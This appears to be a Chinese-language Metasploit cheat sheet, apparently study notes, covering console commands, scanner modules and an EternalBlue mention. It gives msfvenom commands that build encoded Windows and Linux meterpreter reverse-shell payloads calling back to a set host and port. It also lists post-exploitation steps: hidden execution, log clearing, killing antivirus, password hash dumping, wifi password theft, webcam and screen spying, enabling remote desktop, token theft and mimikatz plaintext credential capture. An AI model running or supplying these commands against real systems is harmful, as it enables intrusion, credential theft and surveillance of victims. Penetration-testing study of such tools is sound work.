赞
踩
- data目录(msf用于一些可以编辑的文件)
- documentation目录(msf相关文档,工具介绍)
- lib目录(静态链接库,msf中的一些代码)
- modules目录(msf模块)
- tools目录(msf小工具模块)
- msfdb init:初始化,并启动数据库
- msfconsole:开启msf
- db_status:查看msf数据库状态
- 可以使用kage实现界面化
- help:查看帮助
- exit:退出msf
- show:进行罗列模块
- search:搜索模块
- use:使用模块
- back:返回上一级
- info:查看模块信息
- show options:查看配置
- set:设置一个值
- exploit:执行模块
- jobs:查看后台工作
- kill:杀死工作
- threads:线程(例如设置10个线程 set threads 10)
- arp扫描:auxiliary/scanner/discovery/arp_sweep
- udp扫描:auxiliary/scanner/discovery/udp_sweep
- 端口扫描:auxiliary/scanner/portscan/tcp
永恒之蓝(17-010)
- 常用参数
- msfvenom -l:查看列表
- msfvenom -p:指定payload
- msfvenom -f:指定输出格式
- msfvenom -e:指定编码方式
- msfvenom -i:指定编码次数
- windowsDemo:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.174.129 LPORT=4444
- -e x86/shikata_ga_nai -i 5 -f exe > 1.exe
- linuxDemo: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.174.129 LPORT=4444
- -f elf > 1.elf (linux中可执行文件后缀为.elf)
- 基础操作
- background:返回
- sessions -l:查看所有会话信息
- sessions -i id号:与指定的会话进行交互(id号为存在的会话 输入哪个id就可以切换到哪个会话状态下)
- pwd:查看目标当前目录
- lpwd:查看本地当前目录
- cd:切换到目标的指定目录
- lcd:切换到本地指定目录(l为localhost)
- ls:列出目标的文件
- lls:列出本机当前的文件
- clearev:清理痕迹
- download 目标文件名:将目标文件下载到本地
- upload 目标文件名:将文件上传到目标
- execute 参数:在目标执行命令的功能(-h功能查看有哪些参数)
- execute -f 文件名(例:1.exe) -H:不显示执行情况,创建一个进程(在目标文件上执行文件,隐藏执行)
- ps:列出目标进程
- getuid:查看当前用户的身份
- getprivs:查看当前用户的权限
- migrate 进程号:进程迁移命令(权限就会成为该进程号的权限)
- getpid:查看木马进程
- shell:进入终端环境
- (1)chcp 65001:更改编码,防止乱码(前提是进入终端环境后执行该命令)
- exit:退出终端环境
- idletime:查看目标服务器空闲时间
- sysinfo:查看目标信息
- kill pid号:杀死目标的一个进程
- shutdown:关机
- reboot:重启
- netstat:查看网络连接情况
- getsystem:尝试提权(一般低版本才可以成功,高版本需要配合其他才能成功)
- 模块学习,可以罗列出来选择需要的模块使用
- run killav:杀死杀毒软件(了解一下就行)
- run hashdump:导出目标机的密码
- run post/windows/wlan/wlan_profile:查看wifi密码
- run vnc:实时屏幕监控
- run webcam:开启一个摄像头
- run post/windows/gather/checkvm:查看当前主机是否为虚拟机
- run post/windows/gather/enum_computers:枚举域内的主机
- run post/windows/manage/enable_rdp:开启目标的3389
- run getgui -e:连接对方远程桌面
- help:各种命令罗列
- load incognito:加载incognito工具
- list_tokens -u:列出可以模拟的令牌
- impersonate_token 令牌名:窃取一个指定令牌(令牌名例如:ROOT-5DE52AC98B\\Administrator,需要加俩
- 个\,若令牌名之间有空格,可以加"",将令牌名写入,可以试一试,不一定成功)
- load mimikatz:加载该工具
- wdigest:抓取明文密码
- msfdb init:开启数据库
- armitage:启用图形化界面
- apt update;apt install metasploit-framework:更新
- 手动加入一些插件去exploitdb:网址https://www.exploit-db.com/
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。